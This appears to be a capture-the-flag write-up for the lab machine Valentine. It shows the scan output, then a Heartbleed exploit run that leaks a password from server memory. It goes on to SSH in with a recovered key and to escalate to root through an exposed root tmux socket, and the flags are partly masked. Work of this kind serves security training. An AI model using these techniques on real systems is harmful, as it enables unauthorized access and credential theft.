# Nmap 7.80 scan initiated Thu Sep 26 21:07:03 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 22,80,443 10.10.10.79
Nmap scan report for 10.10.10.79
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
| 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_ 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after: 2019-02-06T00:45:25
|_ssl-date: 2019-09-26T15:29:40+00:00; -7m54s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 - 3.5 (95%), Linux 3.0 (95%), Linux 2.6.38 - 3.0 (94%), Nokia N9 phone (Linux 2.6.32) (94%), Linux 3.2 (94%), Linux 2.6.38 - 2.6.39 (94%), Linux 2.6.39 (94%), Linux 3.5 (93%), Linux 2.6.32 - 3.10 (93%), Linux 2.6.32 - 3.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: -7m54s
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 219.71 ms 10.10.14.1
2 219.86 ms 10.10.10.79
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 26 21:07:36 2019 -- 1 IP address (1 host up) scanned in 33.04 seconds
As the web page signals towards the heartbleed bug, I downloaded a script and tested and exploit for heartbleed. You can download the script from the link below.
$ ./heartbleed.py 10.10.10.79
defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)
##################################################################
Connecting to: 10.10.10.79:443, 1 times
Sending Client Hello for TLSv1.0
Received Server Hello for TLSv1.0
WARNING: 10.10.10.79:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 1
##################################################################
.@....SC[...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==X.7`.....F...q9&.. =
The heartbleed.py script was dumping a base64 encoded string in form of a $text parameter, which when decoded seemed like a password i.e. heartbleedbelievethehype
Now the next task was to find a username of some kind to test the password against the SSH service, so I ran gobuster and found the following directories, out of which /dev seemed very interesting.
hype_key seemed an interesting file, however it was hex encoded to after decoding it form hex, it turned out to be a private RSA key for probably SSH. If going by the naming convention hype_key seemed that it's a key for the user hype.
We had the username, a RSA key, and a password so let's try and connect to the server with these pieces.
$ ssh -i ./ssh.key hype@10.10.10.79
Enter passphrase for key './ssh.key':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$ id
uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare)
hype@Valentine:~$
User own
hype@Valentine:~$ cat Desktop/user.txt
e6710***
Root own
Next part is to enumerate for potential attack vectors using Linux Smart Enumeration script.
Out of everything the things that stood out the most was this list of writeable files and most importantly /.devs/dev_sess this file.
However I was not able to read the file, because it was a socket file, so I moved away from this and tried enumerating the history of the current user.
hype@Valentine:/.devs$ history
1 exit
2 exot
3 exit
4 ls -la
5 cd /
6 ls -la
7 cd .devs
8 ls -la
9 tmux -L dev_sess
10 tmux a -t dev_sess
11 tmux --help
12 tmux -S /.devs/dev_sess
And lo and behold, it turns out it is a tmux socket file which we can attach to using tmux command
tmux -S dev_sess
And as it turns out, this sessions was owned by root and now we have root access on the box.
root@Valentine:/.devs# id
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/.devs# cat /root/root.txt
f1bb6***
root@Valentine:/.devs#
Learning Outcome
Suspicious files and basic user enumeration leads to great results, as always.